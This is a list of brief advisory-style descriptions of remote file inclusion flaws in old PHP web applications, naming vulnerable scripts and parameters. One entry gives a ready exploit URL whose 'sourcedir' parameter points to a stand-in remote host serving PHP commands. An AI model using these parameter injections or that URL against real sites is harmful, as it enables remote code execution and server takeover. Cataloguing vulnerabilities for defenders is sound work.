A remote file include vulnerability exists in phpBBFM version 206-3-3. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system by sending a specially crafted HTTP request containing a malicious URL in the 'includes/functions.php?phpbb_root_path' parameter.
This exploit allows an attacker to execute arbitrary code on the vulnerable server by including a remote file. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'lang_path' parameter in the 'quest_delete.php', 'quest_edit.php' and 'quest_news.php' scripts. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the 'lang_path' parameter.
Variable $g_documentRoot not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
A vulnerability in Jinzora 2.6 allows remote attackers to execute arbitrary code by including a malicious file in the web_root parameter of the mt.php script.
A remote file include vulnerability exists in IncCMS Core 1.0.0. An attacker can exploit this vulnerability to include arbitrary files from remote locations by manipulating the 'inc_dir' parameter in the 'settings.php' script.
A Remote File Inclusion (RFI) vulnerability was found in Supermod 3.0 for yabb. The vulnerable files are Offline.php, Sources/Admin.php, Sources/Offline.php and content/portalshow.php. The vulnerable code in each file is an include statement that does not include the settings.php file. An example exploit URL is http://site.com/community/Offline.php?sourcedir=http://shellurl.com/phpcommands.txt?
A remote file include vulnerability exists in phpBB Security <= 1.0.1. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system. This can be exploited by sending a specially crafted HTTP request containing a malicious URL to the vulnerable script.
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'phpbb_root_path' parameter to 'includes/functions_mod_user.php' script. This can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code.
A remote file include vulnerability exists in PhpBB Prillian French. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.
pbpbb archive for search engines is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary script code in the context of the webserver process. This may facilitate unauthorized access; other attacks are also possible.